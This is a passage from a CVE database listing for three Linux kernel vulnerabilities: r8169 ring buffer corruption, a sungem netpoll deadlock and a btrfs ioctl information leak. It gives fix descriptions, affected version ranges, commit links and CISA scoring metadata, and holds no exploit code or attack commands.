              "status": "unaffected",
              "version": "6.9.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.12",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.3",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nr8169: Fix possible ring buffer corruption on fragmented Tx packets.\n\nAn issue was found on the RTL8125b when transmitting small fragmented\npackets, whereby invalid entries were inserted into the transmit ring\nbuffer, subsequently leading to calls to dma_unmap_single() with a null\naddress.\n\nThis was caused by rtl8169_start_xmit() not noticing changes to nr_frags\nwhich may occur when small packets are padded (to work around hardware\nquirks) in rtl8169_tso_csum_v2().\n\nTo fix this, postpone inspecting nr_frags until after any padding has been\napplied."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:14:41.890Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/61c1c98e2607120ce9c3fa1bf75e6da909712b27"
        },
        {
          "url": "https://git.kernel.org/stable/c/b6d21cf40de103d63ae78551098a7c06af8c98dd"
        },
        {
          "url": "https://git.kernel.org/stable/c/0c48185a95309556725f818b82120bb74e9c627d"
        },
        {
          "url": "https://git.kernel.org/stable/c/68222d7b4b72aa321135cd453dac37f00ec41fd1"
        },
        {
          "url": "https://git.kernel.org/stable/c/078d5b7500d70af2de6b38e226b03f0b932026a6"
        },
        {
          "url": "https://git.kernel.org/stable/c/54e7a0d111240c92c0f02ceba6eb8f26bf6d6479"
        },
        {
          "url": "https://git.kernel.org/stable/c/c71e3a5cffd5309d7f84444df03d5b72600cc417"
        }
      ],
      "title": "r8169: Fix possible ring buffer corruption on fragmented Tx packets.",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38586",
    "datePublished": "2024-06-19T13:37:41.879Z",
    "dateReserved": "2024-06-18T19:36:34.929Z",
    "dateUpdated": "2025-05-04T09:14:41.890Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-38597 (GCVE-0-2024-38597)

Vulnerability from cvelistv5 – Published: 2024-06-19 13:45 – Updated: 2025-05-04 09:14

Title

eth: sungem: remove .ndo_poll_controller to avoid deadlocks

Summary

In the Linux kernel, the following vulnerability has been resolved: eth: sungem: remove .ndo_poll_controller to avoid deadlocks Erhard reports netpoll warnings from sungem: netpoll_send_skb_on_dev(): eth0 enabled interrupts in poll (gem_start_xmit+0x0/0x398) WARNING: CPU: 1 PID: 1 at net/core/netpoll.c:370 netpoll_send_skb+0x1fc/0x20c gem_poll_controller() disables interrupts, which may sleep. We can't sleep in netpoll, it has interrupts disabled completely. Strangely, gem_poll_controller() doesn't even poll the completions, and instead acts as if an interrupt has fired so it just schedules NAPI and exits. None of this has been necessary for years, since netpoll invokes NAPI directly.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e22b23f5888a065d0…
	https://git.kernel.org/stable/c/fbeeb55dbb33d5621…
	https://git.kernel.org/stable/c/476adb3bbbd7886e8…
	https://git.kernel.org/stable/c/5de5aeb98f9a000ad…
	https://git.kernel.org/stable/c/faf94f1eb8a34b2c3…
	https://git.kernel.org/stable/c/6400d205fbbcbcf9b…
	https://git.kernel.org/stable/c/ac0a230f719b02432…

Impacted products

Vendor

Product

Version

Linux

Affected: fe09bb619096a0aa139210748ddc668c2dbe2308 , < e22b23f5888a065d084e87db1eec639c445e677f (git)
Affected: fe09bb619096a0aa139210748ddc668c2dbe2308 , < fbeeb55dbb33d562149c57e794f06b7414e44289 (git)
Affected: fe09bb619096a0aa139210748ddc668c2dbe2308 , < 476adb3bbbd7886e8251d3b9ce2d3c3e680f35d6 (git)
Affected: fe09bb619096a0aa139210748ddc668c2dbe2308 , < 5de5aeb98f9a000adb0db184e32765e4815d860b (git)
Affected: fe09bb619096a0aa139210748ddc668c2dbe2308 , < faf94f1eb8a34b2c31b2042051ef36f63420ecce (git)
Affected: fe09bb619096a0aa139210748ddc668c2dbe2308 , < 6400d205fbbcbcf9b8510157e1f379c1d7e2e937 (git)
Affected: fe09bb619096a0aa139210748ddc668c2dbe2308 , < ac0a230f719b02432d8c7eba7615ebd691da86f4 (git)

Linux

Affected: 3.1
Unaffected: 0 , < 3.1 (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.8.12 , ≤ 6.8.* (semver)
Unaffected: 6.9.3 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:12:25.802Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e22b23f5888a065d084e87db1eec639c445e677f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fbeeb55dbb33d562149c57e794f06b7414e44289"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/476adb3bbbd7886e8251d3b9ce2d3c3e680f35d6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5de5aeb98f9a000adb0db184e32765e4815d860b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/faf94f1eb8a34b2c31b2042051ef36f63420ecce"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6400d205fbbcbcf9b8510157e1f379c1d7e2e937"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ac0a230f719b02432d8c7eba7615ebd691da86f4"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-38597",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:13:34.120030Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:54.536Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/sun/sungem.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e22b23f5888a065d084e87db1eec639c445e677f",
              "status": "affected",
              "version": "fe09bb619096a0aa139210748ddc668c2dbe2308",
              "versionType": "git"
            },
            {
              "lessThan": "fbeeb55dbb33d562149c57e794f06b7414e44289",
              "status": "affected",
              "version": "fe09bb619096a0aa139210748ddc668c2dbe2308",
              "versionType": "git"
            },
            {
              "lessThan": "476adb3bbbd7886e8251d3b9ce2d3c3e680f35d6",
              "status": "affected",
              "version": "fe09bb619096a0aa139210748ddc668c2dbe2308",
              "versionType": "git"
            },
            {
              "lessThan": "5de5aeb98f9a000adb0db184e32765e4815d860b",
              "status": "affected",
              "version": "fe09bb619096a0aa139210748ddc668c2dbe2308",
              "versionType": "git"
            },
            {
              "lessThan": "faf94f1eb8a34b2c31b2042051ef36f63420ecce",
              "status": "affected",
              "version": "fe09bb619096a0aa139210748ddc668c2dbe2308",
              "versionType": "git"
            },
            {
              "lessThan": "6400d205fbbcbcf9b8510157e1f379c1d7e2e937",
              "status": "affected",
              "version": "fe09bb619096a0aa139210748ddc668c2dbe2308",
              "versionType": "git"
            },
            {
              "lessThan": "ac0a230f719b02432d8c7eba7615ebd691da86f4",
              "status": "affected",
              "version": "fe09bb619096a0aa139210748ddc668c2dbe2308",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/sun/sungem.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.1"
            },
            {
              "lessThan": "3.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "3.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "3.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "3.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "3.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.12",
                  "versionStartIncluding": "3.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.3",
                  "versionStartIncluding": "3.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "3.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\neth: sungem: remove .ndo_poll_controller to avoid deadlocks\n\nErhard reports netpoll warnings from sungem:\n\n  netpoll_send_skb_on_dev(): eth0 enabled interrupts in poll (gem_start_xmit+0x0/0x398)\n  WARNING: CPU: 1 PID: 1 at net/core/netpoll.c:370 netpoll_send_skb+0x1fc/0x20c\n\ngem_poll_controller() disables interrupts, which may sleep.\nWe can\u0027t sleep in netpoll, it has interrupts disabled completely.\nStrangely, gem_poll_controller() doesn\u0027t even poll the completions,\nand instead acts as if an interrupt has fired so it just schedules\nNAPI and exits. None of this has been necessary for years, since\nnetpoll invokes NAPI directly."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:14:56.347Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e22b23f5888a065d084e87db1eec639c445e677f"
        },
        {
          "url": "https://git.kernel.org/stable/c/fbeeb55dbb33d562149c57e794f06b7414e44289"
        },
        {
          "url": "https://git.kernel.org/stable/c/476adb3bbbd7886e8251d3b9ce2d3c3e680f35d6"
        },
        {
          "url": "https://git.kernel.org/stable/c/5de5aeb98f9a000adb0db184e32765e4815d860b"
        },
        {
          "url": "https://git.kernel.org/stable/c/faf94f1eb8a34b2c31b2042051ef36f63420ecce"
        },
        {
          "url": "https://git.kernel.org/stable/c/6400d205fbbcbcf9b8510157e1f379c1d7e2e937"
        },
        {
          "url": "https://git.kernel.org/stable/c/ac0a230f719b02432d8c7eba7615ebd691da86f4"
        }
      ],
      "title": "eth: sungem: remove .ndo_poll_controller to avoid deadlocks",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38597",
    "datePublished": "2024-06-19T13:45:46.642Z",
    "dateReserved": "2024-06-18T19:36:34.932Z",
    "dateUpdated": "2025-05-04T09:14:56.347Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35849 (GCVE-0-2024-35849)

Vulnerability from cvelistv5 – Published: 2024-05-17 14:47 – Updated: 2026-01-05 10:35

Title

btrfs: fix information leak in btrfs_ioctl_logical_to_ino()

Summary

In the Linux kernel, the following vulnerability has been resolved: btrfs: fix information leak in btrfs_ioctl_logical_to_ino() Syzbot reported the following information leak for in btrfs_ioctl_logical_to_ino(): BUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:114 [inline] BUG: KMSAN: kernel-infoleak in _copy_to_user+0xbc/0x110 lib/usercopy.c:40 instrument_copy_to_user include/linux/instrumented.h:114 [inline] _copy_to_user+0xbc/0x110 lib/usercopy.c:40 copy_to_user include/linux/uaccess.h:191 [inline] btrfs_ioctl_logical_to_ino+0x440/0x750 fs/btrfs/ioctl.c:3499 btrfs_ioctl+0x714/0x1260 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:904 [inline] __se_sys_ioctl+0x261/0x450 fs/ioctl.c:890 __x64_sys_ioctl+0x96/0xe0 fs/ioctl.c:890 x64_sys_call+0x1883/0x3b50 arch/x86/include/generated/asm/syscalls_64.h:17 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f Uninit was created at: __kmalloc_large_node+0x231/0x370 mm/slub.c:3921 __do_kmalloc_node mm/slub.c:3954 [inline] __kmalloc_node+0xb07/0x1060 mm/slub.c:3973 kmalloc_node include/linux/slab.h:648 [inline] kvmalloc_node+0xc0/0x2d0 mm/util.c:634 kvmalloc include/linux/slab.h:766 [inline] init_data_container+0x49/0x1e0 fs/btrfs/backref.c:2779 btrfs_ioctl_logical_to_ino+0x17c/0x750 fs/btrfs/ioctl.c:3480 btrfs_ioctl+0x714/0x1260 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:904 [inline] __se_sys_ioctl+0x261/0x450 fs/ioctl.c:890 __x64_sys_ioctl+0x96/0xe0 fs/ioctl.c:890 x64_sys_call+0x1883/0x3b50 arch/x86/include/generated/asm/syscalls_64.h:17 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f Bytes 40-65535 of 65536 are uninitialized Memory access of size 65536 starts at ffff888045a40000 This happens, because we're copying a 'struct btrfs_data_container' back to user-space. This btrfs_data_container is allocated in 'init_data_container()' via kvmalloc(), which does not zero-fill the memory. Fix this by using kvzalloc() which zeroes out the memory on allocation.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/689efe22e9b5b7d9d…
	https://git.kernel.org/stable/c/73db209dcd4ae0260…
	https://git.kernel.org/stable/c/30189e54ba80e3209…
	https://git.kernel.org/stable/c/e58047553a4e859da…
	https://git.kernel.org/stable/c/8bdbcfaf3eac42f98…
	https://git.kernel.org/stable/c/3a63cee1a5e14a3e5…
	https://git.kernel.org/stable/c/fddc19631c51d9c17…
	https://git.kernel.org/stable/c/2f7ef5bb4a2f3e481…

Impacted products

Vendor

Product

Version

Linux

Affected: a542ad1bafc7df9fc16de8a6894b350a4df75572 , < 689efe22e9b5b7d9d523119a9a5c3c17107a0772 (git)
Affected: a542ad1bafc7df9fc16de8a6894b350a4df75572 , < 73db209dcd4ae026021234d40cfcb2fb5b564b86 (git)
Affected: a542ad1bafc7df9fc16de8a6894b350a4df75572 , < 30189e54ba80e3209d34cfeea87b848f6ae025e6 (git)
Affected: a542ad1bafc7df9fc16de8a6894b350a4df75572 , < e58047553a4e859dafc8d1d901e1de77c9dd922d (git)
Affected: a542ad1bafc7df9fc16de8a6894b350a4df75572 , < 8bdbcfaf3eac42f98e5486b3d7e130fa287811f6 (git)
Affected: a542ad1bafc7df9fc16de8a6894b350a4df75572 , < 3a63cee1a5e14a3e52c19142c61dd5fcb524f6dc (git)
Affected: a542ad1bafc7df9fc16de8a6894b350a4df75572 , < fddc19631c51d9c17d43e9f822a7bc403af88d54 (git)
Affected: a542ad1bafc7df9fc16de8a6894b350a4df75572 , < 2f7ef5bb4a2f3e481ef05fab946edb97c84f67cf (git)

Linux

Affected: 3.2
Unaffected: 0 , < 3.2 (semver)
Unaffected: 4.19.313 , ≤ 4.19.* (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.158 , ≤ 5.15.* (semver)
Unaffected: 6.1.90 , ≤ 6.1.* (semver)
Unaffected: 6.6.30 , ≤ 6.6.* (semver)
Unaffected: 6.8.9 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35849",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-23T19:26:21.803612Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:01.668Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.438Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/689efe22e9b5b7d9d523119a9a5c3c17107a0772"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/73db209dcd4ae026021234d40cfcb2fb5b564b86"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/30189e54ba80e3209d34cfeea87b848f6ae025e6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e58047553a4e859dafc8d1d901e1de77c9dd922d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8bdbcfaf3eac42f98e5486b3d7e130fa287811f6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3a63cee1a5e14a3e52c19142c61dd5fcb524f6dc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fddc19631c51d9c17d43e9f822a7bc403af88d54"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2f7ef5bb4a2f3e481ef05fab946edb97c84f67cf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/backref.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "689efe22e9b5b7d9d523119a9a5c3c17107a0772",
              "status": "affected",
              "version": "a542ad1bafc7df9fc16de8a6894b350a4df75572",
              "versionType": "git"
            },
            {
              "lessThan": "73db209dcd4ae026021234d40cfcb2fb5b564b86",
              "status": "affected",
              "version": "a542ad1bafc7df9fc16de8a6894b350a4df75572",
              "versionType": "git"
            },
            {
              "lessThan": "30189e54ba80e3209d34cfeea87b848f6ae025e6",
              "status": "affected",
              "version": "a542ad1bafc7df9fc16de8a6894b350a4df75572",
              "versionType": "git"
            },
            {
              "lessThan": "e58047553a4e859dafc8d1d901e1de77c9dd922d",
              "status": "affected",
              "version": "a542ad1bafc7df9fc16de8a6894b350a4df75572",
              "versionType": "git"
            },
            {
              "lessThan": "8bdbcfaf3eac42f98e5486b3d7e130fa287811f6",
              "status": "affected",
              "version": "a542ad1bafc7df9fc16de8a6894b350a4df75572",
              "versionType": "git"
            },
            {
              "lessThan": "3a63cee1a5e14a3e52c19142c61dd5fcb524f6dc",
              "status": "affected",
              "version": "a542ad1bafc7df9fc16de8a6894b350a4df75572",
              "versionType": "git"
            },
            {
              "lessThan": "fddc19631c51d9c17d43e9f822a7bc403af88d54",
              "status": "affected",
              "version": "a542ad1bafc7df9fc16de8a6894b350a4df75572",
              "versionType": "git"
            },
            {
              "lessThan": "2f7ef5bb4a2f3e481ef05fab946edb97c84f67cf",
              "status": "affected",
              "version": "a542ad1bafc7df9fc16de8a6894b350a4df75572",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/backref.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.2"
            },
            {
              "lessThan": "3.2",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.313",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.158",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.30",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.313",
                  "versionStartIncluding": "3.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "3.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "3.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.158",
                  "versionStartIncluding": "3.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.90",
                  "versionStartIncluding": "3.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.30",
                  "versionStartIncluding": "3.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.9",
                  "versionStartIncluding": "3.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix information leak in btrfs_ioctl_logical_to_ino()\n\nSyzbot reported the following information leak for in\nbtrfs_ioctl_logical_to_ino():\n\n  BUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:114 [inline]\n  BUG: KMSAN: kernel-infoleak in _copy_to_user+0xbc/0x110 lib/usercopy.c:40\n   instrument_copy_to_user include/linux/instrumented.h:114 [inline]\n   _copy_to_user+0xbc/0x110 lib/usercopy.c:40\n   copy_to_user include/linux/uaccess.h:191 [inline]\n   btrfs_ioctl_logical_to_ino+0x440/0x750 fs/btrfs/ioctl.c:3499\n   btrfs_ioctl+0x714/0x1260\n   vfs_ioctl fs/ioctl.c:51 [inline]\n   __do_sys_ioctl fs/ioctl.c:904 [inline]\n   __se_sys_ioctl+0x261/0x450 fs/ioctl.c:890\n   __x64_sys_ioctl+0x96/0xe0 fs/ioctl.c:890\n   x64_sys_call+0x1883/0x3b50 arch/x86/include/generated/asm/syscalls_64.h:17\n   do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n   do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83\n   entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\n  Uninit was created at:\n   __kmalloc_large_node+0x231/0x370 mm/slub.c:3921\n   __do_kmalloc_node mm/slub.c:3954 [inline]\n   __kmalloc_node+0xb07/0x1060 mm/slub.c:3973\n   kmalloc_node include/linux/slab.h:648 [inline]\n   kvmalloc_node+0xc0/0x2d0 mm/util.c:634\n   kvmalloc include/linux/slab.h:766 [inline]\n   init_data_container+0x49/0x1e0 fs/btrfs/backref.c:2779\n   btrfs_ioctl_logical_to_ino+0x17c/0x750 fs/btrfs/ioctl.c:3480\n   btrfs_ioctl+0x714/0x1260\n   vfs_ioctl fs/ioctl.c:51 [inline]\n   __do_sys_ioctl fs/ioctl.c:904 [inline]\n   __se_sys_ioctl+0x261/0x450 fs/ioctl.c:890\n   __x64_sys_ioctl+0x96/0xe0 fs/ioctl.c:890\n   x64_sys_call+0x1883/0x3b50 arch/x86/include/generated/asm/syscalls_64.h:17\n   do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n   do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83\n   entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\n  Bytes 40-65535 of 65536 are uninitialized\n  Memory access of size 65536 starts at ffff888045a40000\n\nThis happens, because we\u0027re copying a \u0027struct btrfs_data_container\u0027 back\nto user-space. This btrfs_data_container is allocated in\n\u0027init_data_container()\u0027 via kvmalloc(), which does not 